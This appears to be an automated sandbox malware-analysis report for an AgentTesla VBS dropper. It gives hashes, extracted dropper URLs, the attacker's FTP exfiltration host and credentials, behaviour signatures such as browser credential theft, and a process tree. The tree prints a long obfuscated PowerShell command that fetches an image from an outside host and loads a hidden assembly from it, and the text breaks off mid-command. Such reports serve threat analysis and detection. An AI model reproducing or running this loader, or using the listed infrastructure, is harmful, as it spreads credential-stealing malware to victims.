Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
127s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
05/08/2024, 18:41
General
-
Target
madamwebwin7MPDW-constraints.vbs
-
Size
112KB
-
MD5
d16a594241bdd18814c7c8f184a02210
-
SHA1
a544bc1a93d10c01ec6880adaba6e11fed6d900d
-
SHA256
f45da766b2669cba563f9c59d97c55b5ee73990f85f87f619d136ccbae00d61f
-
SHA512
62f68f1c48200b69deb0a00543d42eaa1194942eac9e1f13749ba913d97662d3c87c0dfb0eb24bf27802f58602988e149fee478b48b1853dd705c533a8330cbe
-
SSDEEP
1536:FkLcccOgt5pz9UGwcFsYmOKVUJW4Wrle/PhG+/kery+bG8:8gt5pmGwisYmOKdS7b
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Extracted
Family
agenttesla
Credentials
Protocol: ftp- Host:
ftp://ftp.fosna.net - Port:
21 - Username:
[email protected] - Password:
=A+N^@~c]~#I
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\madamwebwin7MPDW-constraints.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌VQBy┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBo┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bw┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌Og┐ ∹ ˂ ≷ ㏌v┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌aQBh┐ ∹ ˂ ≷ ㏌Dg┐ ∹ ˂ ≷ ㏌M┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌z┐ ∹ ˂ ≷ ㏌DE┐ ∹ ˂ ≷ ㏌M┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌dQBz┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌YQBy┐ ∹ ˂ ≷ ㏌GM┐ ∹ ˂ ≷ ㏌a┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌HY┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌cgBn┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌3┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌aQB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQBz┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌dgBi┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌Xw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Nw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌DY┐ ∹ ˂ ≷ ㏌Xw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Nw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌DY┐ ∹ ˂ ≷ ㏌LwB2┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌cw┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Go┐ ∹ ˂ ≷ ㏌c┐ ∹ ˂ ≷ ㏌Bn┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Hc┐ ∹ ˂ ≷ ㏌ZQBi┐ ∹ ˂ ≷ ㏌EM┐ ∹ ˂ ≷ ㏌b┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bgB0┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌E4┐ ∹ ˂ ≷ ㏌ZQB3┐ ∹ ˂ ≷ ㏌C0┐ ∹ ˂ ≷ ㏌TwBi┐ ∹ ˂ ≷ ㏌Go┐ ∹ ˂ ≷ ㏌ZQBj┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌BT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌E4┐ ∹ ˂ ≷ ㏌ZQB0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌VwBl┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌QwBs┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌ZQBC┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌B3┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌YgBD┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌aQBl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌EQ┐ ∹ ˂ ≷ ㏌bwB3┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌b┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BE┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌Cg┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌VQBy┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌aQBt┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌ZwBl┐ ∹ ˂ ≷ ㏌FQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌WwBT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌FQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌LgBF┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌YwBv┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌aQBu┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌XQ┐ ∹ ˂ ≷ ㏌6┐ ∹ ˂ ≷ ㏌Do┐ ∹ ˂ ≷ ㏌VQBU┐ ∹ ˂ ≷ ㏌EY┐ ∹ ˂ ≷ ㏌O┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ec┐ ∹ ˂ ≷ ㏌ZQB0┐ ∹ ˂ ≷ ㏌FM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌By┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bgBn┐ ∹ ˂ ≷ ㏌Cg┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌QgB5┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌ZQBz┐ ∹ ˂ ≷ ㏌Ck┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌P┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌8┐ ∹ ˂ ≷ ㏌EI┐ ∹ ˂ ≷ ㏌QQBT┐ ∹ ˂ ≷ ㏌EU┐ ∹ ˂ ≷ ㏌Ng┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌F8┐ ∹ ˂ ≷ ㏌UwBU┐ ∹ ˂ ≷ ㏌EE┐ ∹ ˂ ≷ ㏌UgBU┐ ∹ ˂ ≷ ㏌D4┐ ∹ ˂ ≷ ㏌Pg┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌P┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌8┐ ∹ ˂ ≷ ㏌EI┐ ∹ ˂ ≷ ㏌QQBT┐ ∹ ˂ ≷ ㏌EU┐ ∹ ˂ ≷ ㏌Ng┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌F8┐ ∹ ˂ ≷ ㏌RQBO┐ ∹ ˂ ≷ ㏌EQ┐ ∹ ˂ ≷ ㏌Pg┐ ∹ ˂ ≷ ㏌+┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌V┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌BP┐ ∹ ˂ ≷ ㏌GY┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌Ck┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌ZQBU┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌B0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌E8┐ ∹ ˂ ≷ ㏌Zg┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌RgBs┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Zw┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bz┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌YQBy┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌w┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQBn┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌r┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌T┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌ZwB0┐ ∹ ˂ ≷ ㏌Gg┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌YQBz┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌Ng┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌Ew┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌cgB0┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YgBh┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DQ┐ ∹ ˂ ≷ ㏌QwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌ZQBU┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌B0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌UwB1┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌aQBu┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌L┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YgBh┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DQ┐ ∹ ˂ ≷ ㏌T┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌ZwB0┐ ∹ ˂ ≷ ㏌Gg┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BC┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌WwBT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌EM┐ ∹ ˂ ≷ ㏌bwBu┐ ∹ ˂ ≷ ㏌HY┐ ∹ ˂ ≷ ㏌ZQBy┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌XQ┐ ∹ ˂ ≷ ㏌6┐ ∹ ˂ ≷ ㏌Do┐ ∹ ˂ ≷ ㏌RgBy┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌bQBC┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌cwBl┐ ∹ ˂ ≷ ㏌DY┐ ∹ ˂ ≷ ㏌N┐ ∹ ˂ ≷ ㏌BT┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌cgBp┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Zw┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YgBh┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DQ┐ ∹ ˂ ≷ ㏌QwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bs┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌YQBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BB┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌cwBl┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YgBs┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌WwBT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌FI┐ ∹ ˂ ≷ ㏌ZQBm┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌ZQBj┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQBv┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌LgBB┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌cwBl┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YgBs┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌XQ┐ ∹ ˂ ≷ ㏌6┐ ∹ ˂ ≷ ㏌Do┐ ∹ ˂ ≷ ㏌T┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BC┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌d┐ 